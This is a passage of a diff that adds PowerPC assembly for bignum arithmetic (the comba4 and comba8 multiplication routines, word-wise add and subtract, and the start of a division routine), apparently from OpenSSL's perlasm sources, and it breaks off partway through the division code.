+	addze	r10,r0
+					#mul_add_c(a[1],b[0],c2,c3,c1);
+	$LD	r6, `1*$BNSZ`(r4)		
+	$LD	r7, `0*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r8,r11
+	adde	r12,r9,r12
+	addze	r10,r10
+	$ST	r11,`1*$BNSZ`(r3)	#r[1]=c2
+					#mul_add_c(a[2],b[0],c3,c1,c2);
+	$LD	r6,`2*$BNSZ`(r4)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r8,r12
+	adde	r10,r9,r10
+	addze	r11,r0
+					#mul_add_c(a[1],b[1],c3,c1,c2);
+	$LD	r6,`1*$BNSZ`(r4)		
+	$LD	r7,`1*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r8,r12
+	adde	r10,r9,r10
+	addze	r11,r11
+					#mul_add_c(a[0],b[2],c3,c1,c2);
+	$LD	r6,`0*$BNSZ`(r4)		
+	$LD	r7,`2*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r8,r12
+	adde	r10,r9,r10
+	addze	r11,r11
+	$ST	r12,`2*$BNSZ`(r3)	#r[2]=c3
+					#mul_add_c(a[0],b[3],c1,c2,c3);
+	$LD	r7,`3*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r8,r10
+	adde	r11,r9,r11
+	addze	r12,r0
+					#mul_add_c(a[1],b[2],c1,c2,c3);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r8,r10
+	adde	r11,r9,r11
+	addze	r12,r12
+					#mul_add_c(a[2],b[1],c1,c2,c3);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r8,r10
+	adde	r11,r9,r11
+	addze	r12,r12
+					#mul_add_c(a[3],b[0],c1,c2,c3);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`0*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r8,r10
+	adde	r11,r9,r11
+	addze	r12,r12
+	$ST	r10,`3*$BNSZ`(r3)	#r[3]=c1
+					#mul_add_c(a[3],b[1],c2,c3,c1);
+	$LD	r7,`1*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r8,r11
+	adde	r12,r9,r12
+	addze	r10,r0
+					#mul_add_c(a[2],b[2],c2,c3,c1);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r8,r11
+	adde	r12,r9,r12
+	addze	r10,r10
+					#mul_add_c(a[1],b[3],c2,c3,c1);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r8,r11
+	adde	r12,r9,r12
+	addze	r10,r10
+	$ST	r11,`4*$BNSZ`(r3)	#r[4]=c2
+					#mul_add_c(a[2],b[3],c3,c1,c2);
+	$LD	r6,`2*$BNSZ`(r4)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r8,r12
+	adde	r10,r9,r10
+	addze	r11,r0
+					#mul_add_c(a[3],b[2],c3,c1,c2);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r8,r12
+	adde	r10,r9,r10
+	addze	r11,r11
+	$ST	r12,`5*$BNSZ`(r3)	#r[5]=c3
+					#mul_add_c(a[3],b[3],c1,c2,c3);
+	$LD	r7,`3*$BNSZ`(r5)		
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r8,r10
+	adde	r11,r9,r11
+
+	$ST	r10,`6*$BNSZ`(r3)	#r[6]=c1
+	$ST	r11,`7*$BNSZ`(r3)	#r[7]=c2
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,3,0
+	.long	0
+.size	.bn_mul_comba4,.-.bn_mul_comba4
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_mul_comba8" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+	
+.align	4
+.bn_mul_comba8:
+#
+# Optimized version of the bn_mul_comba8 routine.
+#
+# void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+# r3 contains r
+# r4 contains a
+# r5 contains b
+# r6, r7 are the 2 BN_ULONGs being multiplied.
+# r8, r9 are the results of the 32x32 giving 64 multiply.
+# r10, r11, r12 are the equivalents of c1, c2, and c3.
+#
+	xor	r0,r0,r0		#r0=0. Used in addze below.
+	
+					#mul_add_c(a[0],b[0],c1,c2,c3);
+	$LD	r6,`0*$BNSZ`(r4)	#a[0]
+	$LD	r7,`0*$BNSZ`(r5)	#b[0]
+	$UMULL	r10,r6,r7
+	$UMULH	r11,r6,r7
+	$ST	r10,`0*$BNSZ`(r3)	#r[0]=c1;
+					#mul_add_c(a[0],b[1],c2,c3,c1);
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	addze	r12,r9			# since we didnt set r12 to zero before.
+	addze	r10,r0
+					#mul_add_c(a[1],b[0],c2,c3,c1);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`0*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+	$ST	r11,`1*$BNSZ`(r3)	#r[1]=c2;
+					#mul_add_c(a[2],b[0],c3,c1,c2);
+	$LD	r6,`2*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r0
+					#mul_add_c(a[1],b[1],c3,c1,c2);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[0],b[2],c3,c1,c2);
+	$LD	r6,`0*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+	$ST	r12,`2*$BNSZ`(r3)	#r[2]=c3;
+					#mul_add_c(a[0],b[3],c1,c2,c3);
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r0
+					#mul_add_c(a[1],b[2],c1,c2,c3);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+		
+					#mul_add_c(a[2],b[1],c1,c2,c3);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[3],b[0],c1,c2,c3);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`0*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+	$ST	r10,`3*$BNSZ`(r3)	#r[3]=c1;
+					#mul_add_c(a[4],b[0],c2,c3,c1);
+	$LD	r6,`4*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r0
+					#mul_add_c(a[3],b[1],c2,c3,c1);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[2],b[2],c2,c3,c1);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[1],b[3],c2,c3,c1);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[0],b[4],c2,c3,c1);
+	$LD	r6,`0*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+	$ST	r11,`4*$BNSZ`(r3)	#r[4]=c2;
+					#mul_add_c(a[0],b[5],c3,c1,c2);
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r0
+					#mul_add_c(a[1],b[4],c3,c1,c2);
+	$LD	r6,`1*$BNSZ`(r4)		
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[2],b[3],c3,c1,c2);
+	$LD	r6,`2*$BNSZ`(r4)		
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[3],b[2],c3,c1,c2);
+	$LD	r6,`3*$BNSZ`(r4)		
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[4],b[1],c3,c1,c2);
+	$LD	r6,`4*$BNSZ`(r4)		
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[5],b[0],c3,c1,c2);
+	$LD	r6,`5*$BNSZ`(r4)		
+	$LD	r7,`0*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+	$ST	r12,`5*$BNSZ`(r3)	#r[5]=c3;
+					#mul_add_c(a[6],b[0],c1,c2,c3);
+	$LD	r6,`6*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r0
+					#mul_add_c(a[5],b[1],c1,c2,c3);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[4],b[2],c1,c2,c3);
+	$LD	r6,`4*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[3],b[3],c1,c2,c3);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[2],b[4],c1,c2,c3);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[1],b[5],c1,c2,c3);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[0],b[6],c1,c2,c3);
+	$LD	r6,`0*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+	$ST	r10,`6*$BNSZ`(r3)	#r[6]=c1;
+					#mul_add_c(a[0],b[7],c2,c3,c1);
+	$LD	r7,`7*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r0
+					#mul_add_c(a[1],b[6],c2,c3,c1);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[2],b[5],c2,c3,c1);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[3],b[4],c2,c3,c1);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[4],b[3],c2,c3,c1);
+	$LD	r6,`4*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[5],b[2],c2,c3,c1);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[6],b[1],c2,c3,c1);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[7],b[0],c2,c3,c1);
+	$LD	r6,`7*$BNSZ`(r4)
+	$LD	r7,`0*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+	$ST	r11,`7*$BNSZ`(r3)	#r[7]=c2;
+					#mul_add_c(a[7],b[1],c3,c1,c2);
+	$LD	r7,`1*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r0
+					#mul_add_c(a[6],b[2],c3,c1,c2);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[5],b[3],c3,c1,c2);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[4],b[4],c3,c1,c2);
+	$LD	r6,`4*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[3],b[5],c3,c1,c2);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[2],b[6],c3,c1,c2);
+	$LD	r6,`2*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[1],b[7],c3,c1,c2);
+	$LD	r6,`1*$BNSZ`(r4)
+	$LD	r7,`7*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+	$ST	r12,`8*$BNSZ`(r3)	#r[8]=c3;
+					#mul_add_c(a[2],b[7],c1,c2,c3);
+	$LD	r6,`2*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r0
+					#mul_add_c(a[3],b[6],c1,c2,c3);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[4],b[5],c1,c2,c3);
+	$LD	r6,`4*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[5],b[4],c1,c2,c3);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[6],b[3],c1,c2,c3);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[7],b[2],c1,c2,c3);
+	$LD	r6,`7*$BNSZ`(r4)
+	$LD	r7,`2*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+	$ST	r10,`9*$BNSZ`(r3)	#r[9]=c1;
+					#mul_add_c(a[7],b[3],c2,c3,c1);
+	$LD	r7,`3*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r0
+					#mul_add_c(a[6],b[4],c2,c3,c1);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[5],b[5],c2,c3,c1);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[4],b[6],c2,c3,c1);
+	$LD	r6,`4*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+					#mul_add_c(a[3],b[7],c2,c3,c1);
+	$LD	r6,`3*$BNSZ`(r4)
+	$LD	r7,`7*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+	$ST	r11,`10*$BNSZ`(r3)	#r[10]=c2;
+					#mul_add_c(a[4],b[7],c3,c1,c2);
+	$LD	r6,`4*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r0
+					#mul_add_c(a[5],b[6],c3,c1,c2);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[6],b[5],c3,c1,c2);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+					#mul_add_c(a[7],b[4],c3,c1,c2);
+	$LD	r6,`7*$BNSZ`(r4)
+	$LD	r7,`4*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	addze	r11,r11
+	$ST	r12,`11*$BNSZ`(r3)	#r[11]=c3;
+					#mul_add_c(a[7],b[5],c1,c2,c3);
+	$LD	r7,`5*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r0
+					#mul_add_c(a[6],b[6],c1,c2,c3);
+	$LD	r6,`6*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+					#mul_add_c(a[5],b[7],c1,c2,c3);
+	$LD	r6,`5*$BNSZ`(r4)
+	$LD	r7,`7*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r10,r10,r8
+	adde	r11,r11,r9
+	addze	r12,r12
+	$ST	r10,`12*$BNSZ`(r3)	#r[12]=c1;
+					#mul_add_c(a[6],b[7],c2,c3,c1);
+	$LD	r6,`6*$BNSZ`(r4)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r0
+					#mul_add_c(a[7],b[6],c2,c3,c1);
+	$LD	r6,`7*$BNSZ`(r4)
+	$LD	r7,`6*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r11,r11,r8
+	adde	r12,r12,r9
+	addze	r10,r10
+	$ST	r11,`13*$BNSZ`(r3)	#r[13]=c2;
+					#mul_add_c(a[7],b[7],c3,c1,c2);
+	$LD	r7,`7*$BNSZ`(r5)
+	$UMULL	r8,r6,r7
+	$UMULH	r9,r6,r7
+	addc	r12,r12,r8
+	adde	r10,r10,r9
+	$ST	r12,`14*$BNSZ`(r3)	#r[14]=c3;
+	$ST	r10,`15*$BNSZ`(r3)	#r[15]=c1;
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,3,0
+	.long	0
+.size	.bn_mul_comba8,.-.bn_mul_comba8
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_sub_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+#
+.align	4
+.bn_sub_words:
+#
+#	Handcoded version of bn_sub_words
+#
+#BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+#
+#	r3 = r
+#	r4 = a
+#	r5 = b
+#	r6 = n
+#
+#       Note:	No loop unrolling done since this is not a performance
+#               critical loop.
+
+	xor	r0,r0,r0	#set r0 = 0
+#
+#	check for r6 = 0 AND set carry bit.
+#
+	subfc.	r7,r0,r6        # If r6 is 0 then result is 0.
+				# if r6 > 0 then result !=0
+				# In either case carry bit is set.
+	beq	Lppcasm_sub_adios
+	addi	r4,r4,-$BNSZ
+	addi	r3,r3,-$BNSZ
+	addi	r5,r5,-$BNSZ
+	mtctr	r6
+Lppcasm_sub_mainloop:	
+	$LDU	r7,$BNSZ(r4)
+	$LDU	r8,$BNSZ(r5)
+	subfe	r6,r8,r7	# r6 = r7+carry bit + onescomplement(r8)
+				# if carry = 1 this is r7-r8. Else it
+				# is r7-r8 -1 as we need.
+	$STU	r6,$BNSZ(r3)
+	bdnz-	Lppcasm_sub_mainloop
+Lppcasm_sub_adios:	
+	subfze	r3,r0		# if carry bit is set then r3 = 0 else -1
+	andi.	r3,r3,1         # keep only last bit.
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,4,0
+	.long	0
+.size	.bn_sub_words,.-.bn_sub_words
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_add_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4
+.bn_add_words:
+#
+#	Handcoded version of bn_add_words
+#
+#BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
+#
+#	r3 = r
+#	r4 = a
+#	r5 = b
+#	r6 = n
+#
+#       Note:	No loop unrolling done since this is not a performance
+#               critical loop.
+
+	xor	r0,r0,r0
+#
+#	check for r6 = 0. Is this needed?
+#
+	addic.	r6,r6,0		#test r6 and clear carry bit.
+	beq	Lppcasm_add_adios
+	addi	r4,r4,-$BNSZ
+	addi	r3,r3,-$BNSZ
+	addi	r5,r5,-$BNSZ
+	mtctr	r6
+Lppcasm_add_mainloop:	
+	$LDU	r7,$BNSZ(r4)
+	$LDU	r8,$BNSZ(r5)
+	adde	r8,r7,r8
+	$STU	r8,$BNSZ(r3)
+	bdnz-	Lppcasm_add_mainloop
+Lppcasm_add_adios:	
+	addze	r3,r0			#return carry bit.
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,4,0
+	.long	0
+.size	.bn_add_words,.-.bn_add_words
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_div_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4
+.bn_div_words:
+#
+#	This is a cleaned up version of code generated by
+#	the AIX compiler. The only optimization is to use
+#	the PPC instruction to count leading zeros instead
+#	of call to num_bits_word. Since this was compiled
+#	only at level -O2 we can possibly squeeze it more?
+#	
+#	r3 = h
+#	r4 = l
+#	r5 = d
+	
+	$UCMPI	0,r5,0			# compare r5 and 0
+	bne	Lppcasm_div1		# proceed if d!=0
+	li	r3,-1			# d=0 return -1
+	blr
+Lppcasm_div1:
+	xor	r0,r0,r0		#r0=0
+	li	r8,$BITS
+	$CNTLZ.	r7,r5			#r7 = num leading 0s in d.
+	beq	Lppcasm_div2		#proceed if no leading zeros
+	subf	r8,r7,r8		#r8 = BN_num_bits_word(d)
+	$SHR.	r9,r3,r8		#are there any bits above r8'th?
+	$TR	16,r9,r0		#if there're, signal to dump core...
+Lppcasm_div2:
+	$UCMP	0,r3,r5			#h>=d?
+	blt	Lppcasm_div3		#goto Lppcasm_div3 if not
+	subf	r3,r5,r3		#h-=d ; 
+Lppcasm_div3:				#r7 = BN_BITS2-i. so r7=i
+	cmpi	0,0,r7,0		# is (i == 0)?
+	beq	Lppcasm_div4
+	$SHL	r3,r3,r7		# h = (h<< i)
+	$SHR	r8,r4,r8		# r8 = (l >> BN_BITS2 -i)
+	$SHL	r5,r5,r7		# d<<=i
+	or	r3,r3,r8		# h = (h<<i)|(l>>(BN_BITS2-i))
+	$SHL	r4,r4,r7		# l <<=i
+Lppcasm_div4:
+	$SHRI	r9,r5,`$BITS/2`		# r9 = dh
+					# dl will be computed when needed
+					# as it saves registers.
+	li	r6,2			#r6=2
+	mtctr	r6			#counter will be in count.
+Lppcasm_divouterloop: 
+	$SHRI	r8,r3,`$BITS/2`		#r8 = (h>>BN_BITS4)
+	$SHRI	r11,r4,`$BITS/2`	#r11= (l&BN_MASK2h)>>BN_BITS4
+					# compute here for innerloop.
+	$UCMP	0,r8,r9			# is (h>>BN_BITS4)==dh
+	bne	Lppcasm_div5		# goto Lppcasm_div5 if not
+
+	li	r8,-1
+	$CLRU	r8,r8,`$BITS/2`		#q = BN_MASK2l 
+	b	Lppcasm_div6
+Lppcasm_div5:
+	$UDIV	r8,r3,r9		#q = h/dh
+Lppcasm_div6:
